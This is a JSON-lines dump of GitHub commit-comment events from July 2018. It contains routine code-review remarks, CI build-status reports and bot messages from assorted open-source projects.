{"id":"7925527727","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29613619,"position":null,"line":null,"path":null,"commit_id":"2ac28be6a8b5caa761c23fe682a665d64aa2d4a8","created_at":"2018-07-05T20:58:09Z","updated_at":"2018-07-05T20:58:09Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 491](https://ci.hashicorp.engineering/viewLog.html?buildId=101487&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:08:11"}},"created_at":"2018-07-05T20:58:09Z"}
{"id":"7925528431","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29613626,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-05T20:58:18Z","updated_at":"2018-07-05T20:58:18Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - i386-Windows-7-VisualStudio-14: OK (2930 of 2930 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T20:58:18Z"}
{"id":"7925528457","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29613627,"position":null,"line":null,"path":null,"commit_id":"faf330dc093458cb1bbe834b8d204afbcb08d142","created_at":"2018-07-05T20:58:18Z","updated_at":"2018-07-05T20:58:18Z","author_association":"CONTRIBUTOR","body":"Use the static and you can move deployer selector into a common location."}},"created_at":"2018-07-05T20:58:18Z"}
{"id":"7925528667","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613628,"position":230,"line":202,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:58:21Z","updated_at":"2018-07-05T20:58:21Z","author_association":"NONE","body":"offset needs to differ for TEST_CASE 3 and 4 in a way similar to how you did line 187"}},"created_at":"2018-07-05T20:58:21Z"}
{"id":"7925531448","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"MotoZ-2016/android_kernel_motorola_msm8996"},"payload":{"comment":{"id":29613639,"position":null,"line":null,"path":null,"commit_id":"483f037a2c89a043f50a15dcf6bc982b2988da1e","created_at":"2018-07-05T20:59:00Z","updated_at":"2018-07-05T20:59:00Z","author_association":"NONE","body":"Always happy to review stuff, just need a ping :)\r\n\r\nIn case you haven't seen it, I have an msm-3.18 reference tree with a bunch of warning fixes if you want to have a look: https://github.com/nathanchance/android-kernel-clang/commits/msm-3.18"}},"created_at":"2018-07-05T20:59:00Z"}
{"id":"7925532343","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613641,"position":206,"line":121,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:59:13Z","updated_at":"2018-07-05T20:59:13Z","author_association":"NONE","body":"`IDriverFence::waitCPU` ofc"}},"created_at":"2018-07-05T20:59:13Z"}
{"id":"7925533189","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29613643,"position":14,"line":162,"path":"code/Example/Drasil/GlassBR/Body.hs","commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T20:59:24Z","updated_at":"2018-07-05T20:59:24Z","author_association":"OWNER","body":"Try not to keep each set of changes as small as possible. If you can make things work via using `relToQD` for now, that's fine. Then we can investigate what should really be going on here, and do a proper design."}},"created_at":"2018-07-05T20:59:24Z"}
{"id":"7925533463","type":"CommitCommentEvent","actor":{"login":"maheshbakshi"},"repo":{"name":"maheshbakshi/AutoSuggestion"},"payload":{"comment":{"id":29613644,"position":null,"line":null,"path":null,"commit_id":"16fe3096716e257b391db0e9471a080d127f7013","created_at":"2018-07-05T20:59:28Z","updated_at":"2018-07-05T20:59:28Z","author_association":"OWNER","body":"Delete below files. This file needs to be in AutoSuggestionData:\r\n\r\nSpecifications.xml\r\n\r\nUnitTest_cities_canada-usa.tsv\r\n\r\nUnitTest1_Specifications.xml\r\n\r\n"}},"created_at":"2018-07-05T20:59:28Z"}
{"id":"7925533575","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613646,"position":240,"line":213,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:59:30Z","updated_at":"2018-07-05T20:59:30Z","author_association":"NONE","body":"delete this, look at my previous comment about fencing"}},"created_at":"2018-07-05T20:59:30Z"}
{"id":"7925535074","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613651,"position":240,"line":213,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:59:49Z","updated_at":"2018-07-05T20:59:49Z","author_association":"NONE","body":"fence also needs to be dropped after successful wait"}},"created_at":"2018-07-05T20:59:49Z"}
{"id":"7925535546","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613653,"position":206,"line":121,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:59:55Z","updated_at":"2018-07-05T20:59:55Z","author_association":"NONE","body":"fence also needs to be dropped after successful wait"}},"created_at":"2018-07-05T20:59:55Z"}
{"id":"7925536969","type":"CommitCommentEvent","actor":{"login":"JohanBendz"},"repo":{"name":"JohanBendz/com.fibaro"},"payload":{"comment":{"id":29613657,"position":null,"line":null,"path":null,"commit_id":"13eb930cf296c0c5a4eb2f05655306a388c86f19","created_at":"2018-07-05T21:00:15Z","updated_at":"2018-07-05T21:00:15Z","author_association":"OWNER","body":"Comment on commit should say \"Added support for FGFS-101 ZW5, Product ID 4099.\""}},"created_at":"2018-07-05T21:00:15Z"}
{"id":"7925537695","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29613663,"position":12,"line":59,"path":"code/Language/Drasil/Document.hs","commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T21:00:22Z","updated_at":"2018-07-05T21:00:22Z","author_association":"OWNER","body":"As a first step, yes. And then we should try to deprecate `Data` (and then rename `Data'` to `Data`)."}},"created_at":"2018-07-05T21:00:22Z"}
{"id":"7925538675","type":"CommitCommentEvent","actor":{"login":"pka"},"repo":{"name":"actix/actix-web"},"payload":{"comment":{"id":29613668,"position":101,"line":204,"path":"src/server/h1writer.rs","commit_id":"fec6047ddc4179b68831892b12b031cb23248a5c","created_at":"2018-07-05T21:00:35Z","updated_at":"2018-07-05T21:00:35Z","author_association":"NONE","body":"This might be the reason, why the workaround in #363 doesn't work anymore?"}},"created_at":"2018-07-05T21:00:35Z"}
{"id":"7925539922","type":"CommitCommentEvent","actor":{"login":"arskang"},"repo":{"name":"arskang/Udemy-heroes"},"payload":{"comment":{"id":29613679,"position":null,"line":null,"path":null,"commit_id":"83f3a9c6c4abd634395fd079990c325ef5823845","created_at":"2018-07-05T21:00:52Z","updated_at":"2018-07-05T21:00:52Z","author_association":"OWNER","body":"Comentarios 👍 "}},"created_at":"2018-07-05T21:00:52Z"}
{"id":"7925542030","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29613682,"position":13,"line":235,"path":"code/Language/Drasil/Reference.hs","commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T21:01:19Z","updated_at":"2018-07-05T21:01:19Z","author_association":"OWNER","body":"Both the `DD` and use of `uid` are suspicious. The later should use `Label`, somehow."}},"created_at":"2018-07-05T21:01:19Z"}
{"id":"7925542229","type":"CommitCommentEvent","actor":{"login":"lmerriam"},"repo":{"name":"Flaredown/FlaredownEmber-2"},"payload":{"comment":{"id":29613684,"position":4,"line":26,"path":"frontend/app/styles/global.scss","commit_id":"8429483d643a3494383e7fd4106df965b6f52a0c","created_at":"2018-07-05T21:01:22Z","updated_at":"2018-07-05T21:01:22Z","author_association":"MEMBER","body":"You can use our standard button class. The image I put in #95 is a basic wireframe and doesn't represent style."}},"created_at":"2018-07-05T21:01:22Z"}
{"id":"7925550046","type":"CommitCommentEvent","actor":{"login":"cabo"},"repo":{"name":"cbor-wg/CBORbis"},"payload":{"comment":{"id":29613695,"position":8,"line":804,"path":"draft-ietf-cbor-7049bis.md","commit_id":"874ce34deb195729f7cdf22ff74d1c4526048b54","created_at":"2018-07-05T21:03:02Z","updated_at":"2018-07-05T21:03:02Z","author_association":"COLLABORATOR","body":"s/positive/non-negative/, I'd say\r\n\r\n\"leap seconds are taken into account\" is an eternally misunderstood phrase.  I can argue that it is true, and I also can argue that it is false.  I would not try to explain time here, that's what Joe wrote his draft draft-touch-time for."}},"created_at":"2018-07-05T21:03:02Z"}
{"id":"7925552204","type":"CommitCommentEvent","actor":{"login":"kvasilopoulos"},"repo":{"name":"kvasilopoulos/exuber"},"payload":{"comment":{"id":29613697,"position":null,"line":null,"path":null,"commit_id":"f59ec4ed1cd6b59700a77b06329eb29a76b34040","created_at":"2018-07-05T21:03:30Z","updated_at":"2018-07-05T21:03:30Z","author_association":"OWNER","body":"For some reason that I cannot really understand the build is unsuccessful for OSX: -release. Probably has to do with the installation of some dependencies, maybe Rcpp or RcppArmadillo."}},"created_at":"2018-07-05T21:03:30Z"}
{"id":"7925552806","type":"CommitCommentEvent","actor":{"login":"erfanoabdi"},"repo":{"name":"MotoZ-2016/android_kernel_motorola_msm8996"},"payload":{"comment":{"id":29613698,"position":null,"line":null,"path":null,"commit_id":"483f037a2c89a043f50a15dcf6bc982b2988da1e","created_at":"2018-07-05T21:03:38Z","updated_at":"2018-07-05T21:03:38Z","author_association":"MEMBER","body":"eh! \r\ni didn't knew about this thx, i was looking for qcacld2 clang error fixes. \r\ndo you have anything about it or i should just suppress them in makefile?"}},"created_at":"2018-07-05T21:03:38Z"}
{"id":"7925554980","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29613713,"position":null,"line":null,"path":null,"commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T21:04:08Z","updated_at":"2018-07-05T21:04:08Z","author_association":"OWNER","body":"This usually happens when a later case is \"bad\" and is inferred to have the more restrictive type. And then the error shows up a few lines above.  [Haskell seems to infer the types of cases from the bottom up].  So the true bug is elsewhere in the same function."}},"created_at":"2018-07-05T21:04:08Z"}
{"id":"7925559422","type":"CommitCommentEvent","actor":{"login":"ryanbr"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29613722,"position":5,"line":5476,"path":"easylist/easylist_specific_block.txt","commit_id":"62a5e38447747aa4cf1ee3a67ad059b0477f0d24","created_at":"2018-07-05T21:05:06Z","updated_at":"2018-07-05T21:05:06Z","author_association":"MEMBER","body":"applicable? I dont see this whitelist"}},"created_at":"2018-07-05T21:05:06Z"}
{"id":"7925561796","type":"CommitCommentEvent","actor":{"login":"cabo"},"repo":{"name":"cbor-wg/CBORbis"},"payload":{"comment":{"id":29613731,"position":13,"line":808,"path":"draft-ietf-cbor-7049bis.md","commit_id":"874ce34deb195729f7cdf22ff74d1c4526048b54","created_at":"2018-07-05T21:05:36Z","updated_at":"2018-07-05T21:05:36Z","author_association":"COLLABORATOR","body":"s/precious/precision/\r\n\r\nA receiver generally must be able to receive half and single precision because some implementations will send floats that way if they are exact."}},"created_at":"2018-07-05T21:05:36Z"}
{"id":"7925562715","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"alexcrichton/bzip2-rs"},"payload":{"comment":{"id":29613734,"position":null,"line":null,"path":null,"commit_id":"2647f6a623c63326212733bdb01c80e36058c5cc","created_at":"2018-07-05T21:05:48Z","updated_at":"2018-07-05T21:05:48Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #29 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-05T21:05:48Z"}
{"id":"7925563939","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"alexcrichton/bzip2-rs"},"payload":{"comment":{"id":29613736,"position":null,"line":null,"path":null,"commit_id":"58cfdaf5e734e3016f8f60d9406fe4f4845926bc","created_at":"2018-07-05T21:06:06Z","updated_at":"2018-07-05T21:06:06Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #27 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-05T21:06:06Z"}
{"id":"7925564847","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29613738,"position":null,"line":null,"path":null,"commit_id":"2ac28be6a8b5caa761c23fe682a665d64aa2d4a8","created_at":"2018-07-05T21:06:17Z","updated_at":"2018-07-05T21:06:17Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 492](https://ci.hashicorp.engineering/viewLog.html?buildId=101488&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:08:07"}},"created_at":"2018-07-05T21:06:17Z"}
{"id":"7925572806","type":"CommitCommentEvent","actor":{"login":"cabo"},"repo":{"name":"cbor-wg/CBORbis"},"payload":{"comment":{"id":29613749,"position":16,"line":810,"path":"draft-ietf-cbor-7049bis.md","commit_id":"874ce34deb195729f7cdf22ff74d1c4526048b54","created_at":"2018-07-05T21:08:01Z","updated_at":"2018-07-05T21:08:01Z","author_association":"COLLABORATOR","body":"This is a lower-case \"should\"?  It should be, because while this is motherhood and apple pie, there are not really strong reasons why you SHOULD do that.  If a sender has a clock resolution of 1 s, why not always send integer?  Will we more compact, too (I don't know why the above says it won't)."}},"created_at":"2018-07-05T21:08:01Z"}
{"id":"7925574515","type":"CommitCommentEvent","actor":{"login":"cabo"},"repo":{"name":"cbor-wg/CBORbis"},"payload":{"comment":{"id":29613754,"position":21,"line":814,"path":"draft-ietf-cbor-7049bis.md","commit_id":"874ce34deb195729f7cdf22ff74d1c4526048b54","created_at":"2018-07-05T21:08:24Z","updated_at":"2018-07-05T21:08:24Z","author_association":"COLLABORATOR","body":"Again, this is not something that the tag definition has jurisdiction about."}},"created_at":"2018-07-05T21:08:24Z"}
{"id":"7925577308","type":"CommitCommentEvent","actor":{"login":"ilanpillemer"},"repo":{"name":"gameontext/gameon-mediator"},"payload":{"comment":{"id":29613763,"position":16,"line":176,"path":"mediator-app/src/main/java/org/gameontext/mediator/MapClient.java","commit_id":"0290a801c428250203d41521946e141165bfe0e7","created_at":"2018-07-05T21:09:02Z","updated_at":"2018-07-05T21:09:02Z","author_association":"NONE","body":"`return getSite(roomId) == null ? null : site.getOwner();` \r\nwould make easier on the eye?"}},"created_at":"2018-07-05T21:09:02Z"}
{"id":"7925587269","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"MotoZ-2016/android_kernel_motorola_msm8996"},"payload":{"comment":{"id":29613787,"position":null,"line":null,"path":null,"commit_id":"483f037a2c89a043f50a15dcf6bc982b2988da1e","created_at":"2018-07-05T21:11:19Z","updated_at":"2018-07-05T21:11:19Z","author_association":"NONE","body":"https://github.com/nathanchance/marlin/commit/9929a04e853edb11ccc324bdeaa0594d078f515c\r\n\r\nI surpressed most of them. I fixed a couple easy/obvious ones, along with a bunch of GCC warnings\r\n\r\nhttps://github.com/nathanchance/marlin/commits/0116625dba56b194ec8b79eed450588cef4dee33/drivers/staging/qcacld-2.0?author=nathanchance"}},"created_at":"2018-07-05T21:11:19Z"}
{"id":"7925587840","type":"CommitCommentEvent","actor":{"login":"simscred"},"repo":{"name":"sourcecred/sourcecred"},"payload":{"comment":{"id":29613792,"position":null,"line":null,"path":null,"commit_id":"1cda37e91aed1ace0dd690eebe567afdd330e0b7","created_at":"2018-07-05T21:11:27Z","updated_at":"2018-07-05T21:11:27Z","author_association":"NONE","body":"now we see the hippocracy of the quoteunquote open left . youll nver get away with this ! ill make my own readme and call it CourseShred and i wont give you any fancy soups not even mushrom"}},"created_at":"2018-07-05T21:11:27Z"}
{"id":"7925590934","type":"CommitCommentEvent","actor":{"login":"jkotalik"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29613798,"position":null,"line":null,"path":null,"commit_id":"faf330dc093458cb1bbe834b8d204afbcb08d142","created_at":"2018-07-05T21:12:12Z","updated_at":"2018-07-05T21:12:12Z","author_association":"CONTRIBUTOR","body":"This still won't fix the problem of not using the server type parameter. I don't see why this is a better abstraction."}},"created_at":"2018-07-05T21:12:12Z"}
{"id":"7925601741","type":"CommitCommentEvent","actor":{"login":"davecusatis"},"repo":{"name":"twitchdev/developer-rig"},"payload":{"comment":{"id":29613824,"position":13,"line":13,"path":"README.md","commit_id":"33de5d8ee2da7ad491d9dde770333d0e30ed6327","created_at":"2018-07-05T21:14:48Z","updated_at":"2018-07-05T21:14:48Z","author_association":"CONTRIBUTOR","body":"i think this is probably windows specific, pretty sure mac comes with python2 "}},"created_at":"2018-07-05T21:14:48Z"}
{"id":"7925606113","type":"CommitCommentEvent","actor":{"login":"erfanoabdi"},"repo":{"name":"MotoZ-2016/android_kernel_motorola_msm8996"},"payload":{"comment":{"id":29613833,"position":null,"line":null,"path":null,"commit_id":"483f037a2c89a043f50a15dcf6bc982b2988da1e","created_at":"2018-07-05T21:15:49Z","updated_at":"2018-07-05T21:15:49Z","author_association":"MEMBER","body":"nice nice "}},"created_at":"2018-07-05T21:15:49Z"}
{"id":"7925607204","type":"CommitCommentEvent","actor":{"login":"nobodxbodon"},"repo":{"name":"HL4A/hl4a-android"},"payload":{"comment":{"id":29613841,"position":16,"line":1,"path":"src/main/java/android/support/v4/widget/CircleImageViewX.java","commit_id":"4b0bb60fd97f7ca8ff44dd4133915b6256a4c0aa","created_at":"2018-07-05T21:16:05Z","updated_at":"2018-07-05T21:16:05Z","author_association":"NONE","body":"版权声明最好留着吧?"}},"created_at":"2018-07-05T21:16:05Z"}
{"id":"7925613653","type":"CommitCommentEvent","actor":{"login":"pmotyka"},"repo":{"name":"requests/httpbin"},"payload":{"comment":{"id":29613859,"position":null,"line":null,"path":null,"commit_id":"56a2cf576336361bf54080cacc877d8ee29e2c88","created_at":"2018-07-05T21:17:41Z","updated_at":"2018-07-05T21:17:41Z","author_association":"NONE","body":"The updated template in this commit seems to be broken.  When attempting to startup via docker I get: File \"/usr/local/lib/python3.6/dist-packages/httpbin/templates/flasgger/index.html\", line 147, in template, jinja2.exceptions.TemplateSyntaxError: tag name expected."}},"created_at":"2018-07-05T21:17:41Z"}
{"id":"7925615180","type":"CommitCommentEvent","actor":{"login":"arichiardi"},"repo":{"name":"clojure-emacs/cider"},"payload":{"comment":{"id":29613868,"position":null,"line":null,"path":null,"commit_id":"563ec60eb2576a76474bcc975710a07c2bd95407","created_at":"2018-07-05T21:18:04Z","updated_at":"2018-07-05T21:18:04Z","author_association":"CONTRIBUTOR","body":":+1:"}},"created_at":"2018-07-05T21:18:04Z"}
{"id":"7925627183","type":"CommitCommentEvent","actor":{"login":"AdrianDC"},"repo":{"name":"AgentFabulous/android_development_shell_tools"},"payload":{"comment":{"id":29613883,"position":28,"line":127,"path":"sources/host/tools.rc","commit_id":"1a1dc970419b73013d7efb02e1cee2641db299ff","created_at":"2018-07-05T21:20:44Z","updated_at":"2018-07-05T21:20:44Z","author_association":"NONE","body":"**^-- SC2086: Double quote to prevent globbing and word splitting.**\r\nYou can use `shtoolscheck` to validate the code with shellcheck."}},"created_at":"2018-07-05T21:20:44Z"}
{"id":"7925631456","type":"CommitCommentEvent","actor":{"login":"nobodxbodon"},"repo":{"name":"HL4A/hl4a-android"},"payload":{"comment":{"id":29613892,"position":49,"line":32,"path":"src/main/java/android/support/v4/widget/CircleImageViewX.java","commit_id":"4b0bb60fd97f7ca8ff44dd4133915b6256a4c0aa","created_at":"2018-07-05T21:21:44Z","updated_at":"2018-07-05T21:21:44Z","author_association":"NONE","body":"这里的格式化有问题吧?"}},"created_at":"2018-07-05T21:21:44Z"}
{"id":"7925632773","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29613899,"position":14,"line":77,"path":"Keyed/Letters.xml","commit_id":"31706082d64cf6a6dde78f8dc891488fd96a88b3","created_at":"2018-07-05T21:22:03Z","updated_at":"2018-07-05T21:22:03Z","author_association":"CONTRIBUTOR","body":"Falta esta. "}},"created_at":"2018-07-05T21:22:03Z"}
{"id":"7925636188","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29613907,"position":null,"line":null,"path":null,"commit_id":"ec83054acaf0abce6fc177567d3d85947f3833e2","created_at":"2018-07-05T21:22:54Z","updated_at":"2018-07-05T21:22:54Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: Tests Failed (624 of 2930 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-21.3%25-red.png)</a> \n"}},"created_at":"2018-07-05T21:22:54Z"}
{"id":"7925658635","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29613950,"position":18,"line":18,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-05T21:28:31Z","updated_at":"2018-07-05T21:28:31Z","author_association":"NONE","body":"вывод поля в отдельный метод?"}},"created_at":"2018-07-05T21:28:31Z"}
{"id":"7925669888","type":"CommitCommentEvent","actor":{"login":"rasple"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29613972,"position":null,"line":null,"path":null,"commit_id":"7a4788df8645c8c7e9d505f89e7b4947c836c16f","created_at":"2018-07-05T21:31:18Z","updated_at":"2018-07-05T21:31:18Z","author_association":"OWNER","body":"Sorry nix besonderes"}},"created_at":"2018-07-05T21:31:18Z"}
{"id":"7925670730","type":"CommitCommentEvent","actor":{"login":"natecrow"},"repo":{"name":"natecrow/my-destinations"},"payload":{"comment":{"id":29613974,"position":null,"line":null,"path":null,"commit_id":"4d015e45f9d0e400f4d52f5506cc85889e981476","created_at":"2018-07-05T21:31:31Z","updated_at":"2018-07-05T21:31:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Page not reloading after creating list](https://trello.com/c/swJwWuId/26-page-not-reloading-after-creating-list)"}},"created_at":"2018-07-05T21:31:31Z"}
{"id":"7925671158","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29613975,"position":null,"line":null,"path":null,"commit_id":"819fc522f706d8a6b6f7eadafbcf5294b0dd7f0e","created_at":"2018-07-05T21:31:37Z","updated_at":"2018-07-05T21:31:37Z","author_association":"COLLABORATOR","body":"```\r\n[ 1 of 36] Compiling Drasil.DocumentLanguage.Definitions ( Drasil\\DocumentLanguage\\Definitions.hs, .stack-work\\dist\\5c8418a7\\build\\nopcm\\nopcm-tmp\\Drasil\\DocumentLanguage\\Definitions.o )\r\n\r\nDrasil\\DocumentLanguage\\Definitions.hs:53:50: error:\r\n    Not in scope: type constructor or class ‘DataDefinition’\r\n    Perhaps you meant one of these:\r\n      ‘QDefinition’ (imported from Language.Drasil),\r\n      ‘Definition’ (imported from Language.Drasil)\r\n\t\t  |\r\n\t\t  | ddefn' :: HasSymbolTable ctx => Fields -> ctx -> Definition -> Contents\r\n```\r\nI'm not sure why I can't get past this this error after merging master into this branch... Definitions.hs imports Language.Drasil.hs, which exports the functions and data type defined in Language.Drasil.Chunk.DataDefinition.hs. @samm82 @JacquesCarette Do you know why this may be happening?"}},"created_at":"2018-07-05T21:31:37Z"}
{"id":"7925675057","type":"CommitCommentEvent","actor":{"login":"droptablestar"},"repo":{"name":"CodingDojoDallas/mean_july_2018"},"payload":{"comment":{"id":29613985,"position":null,"line":null,"path":null,"commit_id":"178bff6249435e7ea9429100d9d96f60efffa936","created_at":"2018-07-05T21:32:36Z","updated_at":"2018-07-05T21:32:36Z","author_association":"COLLABORATOR","body":"This looks really good. "}},"created_at":"2018-07-05T21:32:36Z"}
{"id":"7925678872","type":"CommitCommentEvent","actor":{"login":"nextgenusfs"},"repo":{"name":"nextgenusfs/funannotate"},"payload":{"comment":{"id":29613991,"position":null,"line":null,"path":null,"commit_id":"78191c12a5e21ce3e8667038a168794d3ead6e5d","created_at":"2018-07-05T21:33:36Z","updated_at":"2018-07-05T21:33:36Z","author_association":"OWNER","body":"Can make the download py2/3 compatible like this: https://github.com/nextgenusfs/amptk/blob/53d46bd1d6d3841bf7207365eea2992e078cfea4/bin/amptk.py#L17"}},"created_at":"2018-07-05T21:33:36Z"}
{"id":"7925684994","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/CandyCrushReplica"},"payload":{"comment":{"id":29614021,"position":null,"line":null,"path":null,"commit_id":"7fb6ca7a3e325e51d9d5c622210ca5a9c7a0da63","created_at":"2018-07-05T21:35:15Z","updated_at":"2018-07-05T21:35:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Github Repository](https://trello.com/c/l9y4Zulj/8-github-repository)"}},"created_at":"2018-07-05T21:35:15Z"}
{"id":"7925695557","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29614041,"position":null,"line":null,"path":null,"commit_id":"0bd5ef235f89a049b78d43aabc22f1f168825070","created_at":"2018-07-05T21:37:49Z","updated_at":"2018-07-05T21:37:49Z","author_association":"OWNER","body":"already done ballon and aergo added last week... cuballon and zealot take care of that... \"OptionalMiners\""}},"created_at":"2018-07-05T21:37:49Z"}
{"id":"7925701905","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29614053,"position":null,"line":null,"path":null,"commit_id":"faf330dc093458cb1bbe834b8d204afbcb08d142","created_at":"2018-07-05T21:39:27Z","updated_at":"2018-07-05T21:39:27Z","author_association":"CONTRIBUTOR","body":"Why won't it? You use server type parameter to create deployer."}},"created_at":"2018-07-05T21:39:27Z"}
{"id":"7925714377","type":"CommitCommentEvent","actor":{"login":"CoderJolly"},"repo":{"name":"vardanator/google-2017-sticker"},"payload":{"comment":{"id":29614073,"position":null,"line":null,"path":null,"commit_id":"77aa30edbf7f14602ceec34a78960b01b7920f42","created_at":"2018-07-05T21:42:31Z","updated_at":"2018-07-05T21:42:31Z","author_association":"NONE","body":"Could u pls let me know how to use it?\r\n"}},"created_at":"2018-07-05T21:42:31Z"}
{"id":"7925714414","type":"CommitCommentEvent","actor":{"login":"whitedragon0000"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29614074,"position":null,"line":null,"path":null,"commit_id":"691299b6eb41052d8b755cf8c6d03e0bd7d75e64","created_at":"2018-07-05T21:42:32Z","updated_at":"2018-07-05T21:42:32Z","author_association":"COLLABORATOR","body":"Thanks!!"}},"created_at":"2018-07-05T21:42:32Z"}
